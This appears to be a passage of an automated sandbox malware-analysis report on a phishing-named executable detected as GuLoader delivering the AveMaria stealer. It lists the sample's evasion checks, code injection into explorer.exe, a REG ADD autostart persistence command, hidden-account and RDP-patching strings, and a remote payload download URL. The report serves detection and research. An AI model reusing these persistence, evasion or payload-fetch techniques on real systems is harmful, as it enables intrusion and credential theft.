Source: Binary string: TextShaping.pdb( source: WerFault.exe, 00000014.00000003.125917002362.0000000006562000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126023187158.00000000068BD000.00000004.00000001.sdmp
Source: Binary string: ws2_32.pdb( source: WerFault.exe, 00000014.00000003.125917746027.0000000005D1E000.00000004.00000001.sdmp
Source: Binary string: wUxTheme.pdb( source: WerFault.exe, 00000017.00000003.126019837993.000000000613C000.00000004.00000001.sdmp
Source: Binary string: wgdi32.pdb( source: WerFault.exe, 00000014.00000003.125905520713.0000000002DF6000.00000004.00000001.sdmp
Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000014.00000003.125909199577.0000000005CF1000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126016848001.000000000647B000.00000004.00000001.sdmp
Source: Binary string: >+D C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: Sales Order List.exe, 00000004.00000003.125766201878.000000001F5C1000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.125849081972.000000000EA70000.00000040.00000001.sdmp
Source: Binary string: C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: Sales Order List.exe, 00000004.00000003.125766201878.000000001F5C1000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.125849081972.000000000EA70000.00000040.00000001.sdmp
Source: Binary string: msctf.pdb( source: WerFault.exe, 00000014.00000003.125910562779.0000000005D02000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126021040208.0000000006486000.00000004.00000001.sdmp
Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000014.00000003.125903704223.0000000002D7B000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126009302903.0000000003351000.00000004.00000001.sdmp
Source: Binary string: combase.pdb source: WerFault.exe, 00000014.00000003.125907854720.0000000002E1D000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126010408748.00000000060E2000.00000004.00000001.sdmp
Source: Binary string: wuser32.pdb( source: WerFault.exe, 00000014.00000003.125905424783.0000000002DEB000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126008630763.00000000033C4000.00000004.00000001.sdmp
Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000014.00000003.125903667098.0000000002D75000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126009250720.000000000334B000.00000004.00000001.sdmp
Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126012936139.000000000646A000.00000004.00000001.sdmp
Source: Binary string: coml2.pdb} source: WerFault.exe, 00000017.00000003.126033336482.0000000005528000.00000004.00000040.sdmp
Source: Binary string: TextInputFramework.pdb( source: WerFault.exe, 00000014.00000003.125910630742.0000000005D0D000.00000004.00000001.sdmp
Source: Binary string: apphelp.pdb source: WerFault.exe, 00000014.00000003.125927969397.0000000005260000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126009354250.0000000003358000.00000004.00000001.sdmp
Source: Binary string: wuser32.pdb source: WerFault.exe, 00000014.00000003.125905424783.0000000002DEB000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126008630763.00000000033C4000.00000004.00000001.sdmp
Source: Binary string: ole32.pdb( source: WerFault.exe, 00000014.00000003.125907817675.0000000002E17000.00000004.00000001.sdmp
Source: Binary string: msvcp_win.pdb( source: WerFault.exe, 00000014.00000003.125904042199.0000000002E01000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126008843786.00000000033DB000.00000004.00000001.sdmp

Data Obfuscation:

barindex
Yara detected GuLoader
Source: Yara match File source: 00000002.00000002.125547203981.00000000022E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000000.125996962988.0000000002330000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000000.125886367131.0000000002330000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.125545111088.0000000001660000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000000.125990940523.0000000002330000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000000.125891818807.0000000002330000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.126072449802.0000000002330000.00000040.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_00404402 pushfd ; retf 2_2_0040441F
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_00403827 push es; ret 2_2_00403829
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_004044E6 pushfd ; retf 2_2_004044E7
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_0040A880 pushfd ; ret 2_2_0040A894
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_0040A101 push edx; retf 2_2_0040A10A
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_00404585 pushfd ; retf 2_2_00404597
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_0040459A pushfd ; retf 2_2_004045AB
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_004051BF push dword ptr [esi]; iretd 2_2_004051C6
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_0040665E pushfd ; retf 2_2_0040665F
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_0040427A pushfd ; retf 2_2_0040427B
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_004062C2 pushfd ; retf 2_2_004062C3
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_0040A6C2 push ebx; retf 2_2_0040A6CA
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_004072E2 pushfd ; retf 2_2_0040730F
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_0040434A pushfd ; retf 2_2_0040434B
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_00404336 pushfd ; retf 2_2_00404347
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_0040633E pushfd ; retf 2_2_0040634B
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_004067DF pushfd ; retf 2_2_004067E7
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022E1E3D pushad ; retn EE2Ch 2_2_022E1D75
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022ED671 push 1D9AA5CFh; iretd 2_2_022ED765
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022E1698 push ebx; retn F070h 2_2_022E183E
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022E3D31 push ebp; retf 67B7h 2_2_022E5122
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022E1AD3 pushad ; retn EE2Ch 2_2_022E1D75
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022E9B0B push ebp; retf 2_2_022E9B0C
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022E5FF4 push esp; iretd 2_2_022E5FF5
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EC7CD push 1D6C9AC2h; retn 6C9Ah 2_2_022ECC4A
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022ED414 push 3A04CBC7h; retf 2_2_022ED629
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022E0012 push AE35C959h; retf 2_2_022E001E
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022E6479 push esp; iretd 2_2_022E66CA
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022E24F2 push 812B1A06h; ret 2_2_022E24FD
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022E2D33 push ebp; retf 57CCh 2_2_022E2E80
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EDD13 push 708CCF4Eh; iretd 2_2_022EDF11

Persistence and Installation Behavior:

barindex
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\Desktop\Sales Order List.exe File created: C:\ProgramData\images.exe Jump to dropped file
Drops PE files
Source: C:\Users\user\Desktop\Sales Order List.exe File created: C:\ProgramData\images.exe Jump to dropped file

Boot Survival:

barindex
Creates an undocumented autostart registry key
Source: C:\Windows\SysWOW64\reg.exe Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Load Jump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Contains functionality to hide user accounts
Source: Sales Order List.exe, 00000004.00000003.125765591469.00000000018A8000.00000004.00000001.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: Sales Order List.exe, 00000004.00000003.125765591469.00000000018A8000.00000004.00000001.sdmp String found in binary or memory: 0.rudp\ICACLS.exe\xcopy.exe "" /GRANT:r *S-1-1-0:(OI)(CI)F /T\AppData\Local\Google\AppData\Local\Google\xcopy.exe /Y /E /C \AppData\Roaming\Mozilla\AppData\Roaming\Mozilla\\AppData\Roaming\Microsoft\AppData\Roaming\Microsoft\\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameTypemultirdp[experimental] patch Terminal Server service to allow multiples userstermsrv.dllexplorer.exeTASKmgr.exeProcessHacker.exeregedit.exentdll.dllLdrGetProcedureAddressRtlNtStatusToDosErrorRtlSetLastWin32ErrorNtAllocateVirtualMemoryNtProtectVirtualMemoryNtWriteVirtualMemoryLdrLoadDllRtlCreateUserThread
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Users\user\Desktop\Sales Order List.exe File opened: C:\ProgramData\images.exe:Zone.Identifier read attributes | delete Jump to behavior
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\Sales Order List.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate Jump to behavior
Source: C:\Users\user\Desktop\Sales Order List.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Sales Order List.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Sales Order List.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\images.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect Any.run
Source: C:\Users\user\Desktop\Sales Order List.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\Sales Order List.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Users\user\Desktop\Sales Order List.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\Sales Order List.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: Sales Order List.exe, 00000002.00000002.125548712664.00000000053D0000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSHTML.DLL
Source: Sales Order List.exe, 00000002.00000002.125548712664.00000000053D0000.00000004.00000001.sdmp, Sales Order List.exe, 00000004.00000002.125877417935.0000000003310000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: Sales Order List.exe, 00000004.00000002.125877417935.0000000003310000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=14RIMS-BY6HJEY7HTTEKF9CX7RHIUCVVN
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\Sales Order List.exe TID: 7532 Thread sleep count: 70 > 30 Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022F3AA0 rdtsc 2_2_022F3AA0
Contains functionality to detect virtual machines (SLDT)
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 4_3_018A1329 sldt word ptr [eax] 4_3_018A1329
Source: C:\Users\user\Desktop\Sales Order List.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\Sales Order List.exe System information queried: ModuleInformation Jump to behavior
Source: Sales Order List.exe, 00000002.00000002.125548774055.0000000005499000.00000004.00000001.sdmp, Sales Order List.exe, 00000004.00000002.125877555825.00000000033D9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: WerFault.exe, 00000017.00000002.126063872302.0000000003308000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAWu
Source: Sales Order List.exe, 00000002.00000002.125548774055.0000000005499000.00000004.00000001.sdmp, Sales Order List.exe, 00000004.00000002.125877555825.00000000033D9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: Sales Order List.exe, 00000004.00000002.125877555825.00000000033D9000.00000004.00000001.sdmp Binary or memory string: vmicshutdown
Source: WerFault.exe, 00000014.00000003.125951857336.0000000002E13000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllppsessionguid" val="00001060-0001-0011-c1a2-7ed0d8dfd701" />
Source: Sales Order List.exe, 00000002.00000002.125548774055.0000000005499000.00000004.00000001.sdmp, Sales Order List.exe, 00000004.00000002.125877555825.00000000033D9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: Sales Order List.exe, 00000004.00000003.125872058569.000000000189B000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW-
Source: Sales Order List.exe, 00000002.00000002.125548774055.0000000005499000.00000004.00000001.sdmp, Sales Order List.exe, 00000004.00000002.125877555825.00000000033D9000.00000004.00000001.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
Source: explorer.exe, 0000000B.00000002.130418618344.0000000010A3B000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW2
Source: Sales Order List.exe, 00000002.00000002.125548774055.0000000005499000.00000004.00000001.sdmp, Sales Order List.exe, 00000004.00000002.125877555825.00000000033D9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Time Synchronization Service
Source: Sales Order List.exe, 00000004.00000002.125877555825.00000000033D9000.00000004.00000001.sdmp Binary or memory string: vmicvss
Source: Sales Order List.exe, explorer.exe, 0000000B.00000002.130418921281.0000000010A5F000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000002.125980596864.0000000002E13000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000002.126063872302.0000000003308000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW
Source: Sales Order List.exe, 00000004.00000002.125877417935.0000000003310000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=https://drive.google.com/uc?export=download&id=14riMs-By6HjEY7hTtEKf9cx7RhIUcVvn
Source: Amcache.hve.20.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Sales Order List.exe, 00000002.00000002.125548712664.00000000053D0000.00000004.00000001.sdmp, Sales Order List.exe, 00000004.00000002.125877417935.0000000003310000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: Sales Order List.exe, 00000002.00000002.125548774055.0000000005499000.00000004.00000001.sdmp, Sales Order List.exe, 00000004.00000002.125877555825.00000000033D9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: Sales Order List.exe, 00000002.00000002.125548774055.0000000005499000.00000004.00000001.sdmp, Sales Order List.exe, 00000004.00000002.125877555825.00000000033D9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: Sales Order List.exe, 00000002.00000002.125548774055.0000000005499000.00000004.00000001.sdmp, Sales Order List.exe, 00000004.00000002.125877555825.00000000033D9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: Sales Order List.exe, 00000002.00000002.125548712664.00000000053D0000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\syswow64\mshtml.dll
Source: Sales Order List.exe, 00000004.00000002.125877555825.00000000033D9000.00000004.00000001.sdmp Binary or memory string: vmicheartbeat

Anti Debugging:

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\Sales Order List.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\Sales Order List.exe Thread information set: HideFromDebugger Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022F3AA0 rdtsc 2_2_022F3AA0
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022F2200 mov eax, dword ptr fs:[00000030h] 2_2_022F2200
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022ED2AB mov eax, dword ptr fs:[00000030h] 2_2_022ED2AB
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022F4F00 mov eax, dword ptr fs:[00000030h] 2_2_022F4F00
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022ED079 mov eax, dword ptr fs:[00000030h] 2_2_022ED079
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022F2DB4 mov eax, dword ptr fs:[00000030h] 2_2_022F2DB4
Source: C:\ProgramData\images.exe Code function: 15_2_02342200 mov eax, dword ptr fs:[00000030h] 15_2_02342200
Source: C:\ProgramData\images.exe Code function: 15_2_0233D2AD mov eax, dword ptr fs:[00000030h] 15_2_0233D2AD
Source: C:\ProgramData\images.exe Code function: 15_2_02344F00 mov eax, dword ptr fs:[00000030h] 15_2_02344F00
Source: C:\ProgramData\images.exe Code function: 15_2_02342DB4 mov eax, dword ptr fs:[00000030h] 15_2_02342DB4
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\Sales Order List.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\Sales Order List.exe Process queried: DebugPort Jump to behavior
Source: C:\ProgramData\images.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EEE64 LdrInitializeThunk, 2_2_022EEE64
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022F6B37 RtlAddVectoredExceptionHandler, 2_2_022F6B37
Source: C:\ProgramData\images.exe Code function: 15_2_02346B37 RtlAddVectoredExceptionHandler, 15_2_02346B37

HIPS / PFW / Operating System Protection Evasion:

barindex
Writes to foreign memory regions
Source: C:\Users\user\Desktop\Sales Order List.exe Memory written: C:\Windows\explorer.exe base: 33370000 Jump to behavior
Source: C:\Users\user\Desktop\Sales Order List.exe Memory written: C:\Windows\explorer.exe base: EA70000 Jump to behavior
Allocates memory in foreign processes
Source: C:\Users\user\Desktop\Sales Order List.exe Memory allocated: C:\Windows\explorer.exe base: EA70000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\Sales Order List.exe Memory allocated: C:\Windows\explorer.exe base: 33370000 protect: page execute and read and write Jump to behavior
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Users\user\Desktop\Sales Order List.exe Memory written: PID: 4576 base: 33370000 value: 58 Jump to behavior
Source: C:\Users\user\Desktop\Sales Order List.exe Memory written: PID: 4576 base: EA70000 value: E8 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\Sales Order List.exe Process created: C:\Users\user\Desktop\Sales Order List.exe "C:\Users\user\Desktop\Sales Order List.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe" Jump to behavior
Source: explorer.exe, 0000000B.00000000.125828329284.0000000004ECA000.00000004.00000001.sdmp, images.exe, 0000000F.00000000.125990083122.0000000000DB1000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000B.00000000.125822649436.0000000000FB0000.00000002.00020000.sdmp, images.exe, 0000000F.00000000.125990083122.0000000000DB1000.00000002.00020000.sdmp Binary or memory string: Progman
Source: explorer.exe, 0000000B.00000002.130379665541.00000000008E9000.00000004.00000020.sdmp Binary or memory string: 1Progman
Source: explorer.exe, 0000000B.00000000.125822649436.0000000000FB0000.00000002.00020000.sdmp, images.exe, 0000000F.00000000.125990083122.0000000000DB1000.00000002.00020000.sdmp Binary or memory string: 5Program ManagerJ
Source: explorer.exe, 0000000B.00000000.125822649436.0000000000FB0000.00000002.00020000.sdmp, images.exe, 0000000F.00000000.125990083122.0000000000DB1000.00000002.00020000.sdmp Binary or memory string: Progmanlock

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
Increases the number of concurrent connection per server for Internet Explorer
Source: C:\Users\user\Desktop\Sales Order List.exe Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings MaxConnectionsPerServer 10 Jump to behavior
AV process strings found (often used to terminate AV products)
Source: Amcache.hve.20.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.20.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.20.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.2107.4-0\msmpeng.exe
Source: Amcache.hve.20.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information:

barindex
Yara detected Generic Dropper
Source: Yara match File source: Process Memory Space: Sales Order List.exe PID: 6892, type: MEMORYSTR
Yara detected AveMaria stealer
Source: Yara match File source: 4.3.Sales Order List.exe.18f3e10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.Sales Order List.exe.18f3e10.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000003.125765591469.00000000018A8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.125766752022.00000000018F2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.125766920138.00000000018F6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.125766406921.00000000018A8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.125766059758.00000000018F2000.00000004.00000001.sdmp, type: MEMORY
GuLoader behavior detected
Source: Initial file Signature Results: GuLoader behavior
Yara detected Credential Stealer
Source: Yara match File source: 4.3.Sales Order List.exe.18f3e10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.Sales Order List.exe.18f3e10.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000003.125765591469.00000000018A8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.125766752022.00000000018F2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.125766920138.00000000018F6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.125766406921.00000000018A8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.125766059758.00000000018F2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Sales Order List.exe PID: 6892, type: MEMORYSTR

Remote Access Functionality:

barindex
Yara detected AveMaria stealer
Source: Yara match File source: 4.3.Sales Order List.exe.18f3e10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.Sales Order List.exe.18f3e10.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000003.125765591469.00000000018A8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.125766752022.00000000018F2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.125766920138.00000000018F6000.00000004.00000001.sdmp, type: MEMORY
